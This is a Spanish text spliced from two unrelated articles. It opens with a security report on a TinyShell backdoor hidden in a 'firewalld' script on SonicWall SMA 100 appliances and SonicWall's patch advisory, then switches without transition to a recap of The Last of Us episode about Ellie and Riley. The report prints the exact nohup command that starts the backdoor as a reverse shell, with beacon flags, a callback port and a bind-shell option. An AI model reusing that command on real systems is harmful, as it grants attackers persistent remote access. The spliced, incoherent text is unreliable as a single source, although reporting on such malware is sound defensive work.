La primera función en firewalld ejecuta la puerta trasera TinyShell httpsd con comando nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & Si el httpsd el proceso aún no se está ejecutando. Esto configura a TinyShell en modo de shell inverso, indicándole que llame a la dirección IP y al puerto antes mencionados en una hora y día específicos representados por el -m bandera, con un intervalo de baliza definido por el -d bandera. El binario incorpora una dirección IP codificada, que se utiliza en el modo de shell inverso si el argumento de la dirección IP se deja en blanco. También tiene un modo de shell de enlace de escucha disponible.

Los investigadores dijeron que no sabían cuál era el vector de infección inicial.

La semana pasada, SonicWall publicó un aviso que instaba a los usuarios de SMA 100 a actualizarse a la versión 10.2.1.7 o superior. Esas versiones incluyen mejoras como el monitoreo de integridad de archivos y la identificación de procesos anómalos. El parche está disponible aquí. Los usuarios también deben revisar periódicamente los registros en busca de signos de compromiso, incluidos inicios de sesión anormales o tráfico interno.

A lo largo de los primeros seis episodios, Ellie le menciona a Joel que su escuela en QZ fue terrible. Esto se vuelve especialmente claro en la secuencia de terror de este episodio con el hombre infectado solitario, cuando nos damos cuenta de que a Ellie nunca le han enseñado que los infectados necesitan ser apuñalados en la cabeza específicamente. Esta parece ser una información bastante crucial para los niños que están creciendo en un apocalipsis zombi, pero parece que FEDRA pensó que sería una buena manera de castigar a aquellos que rompen las reglas y se salen de los límites como lo hace Ellie. Los niños con más probabilidades de verse atacados por los infectados también son los niños con más probabilidades de abandonar el QZ y unirse a las luciérnagas, por lo que mantenerlos ignorantes parece una buena manera de garantizar que sus rebeliones no duren. Para una escuela dirigida por un grupo de «imbéciles fascistas», como dice Riley, esta lógica parece normal.

También está la forma en que esta pelea enfatiza cuán jóvenes son tanto Riley como Ellie. Son tan verdes que aún no pueden manejar ni un solo infectado, un marcado contraste con lo rudo que se está volviendo Ellie en la actualidad. Ellie está llegando lentamente al punto en el que sería capaz de manejar este tipo de incidentes sin sudar. Eso suena como algo claramente bueno, pero también hará que este recuerdo sea aún más angustioso en retrospectiva. Ese sentimiento de «si tan solo supiera lo que sé ahora» empeorará cuanto más Ellie mire hacia atrás en este momento.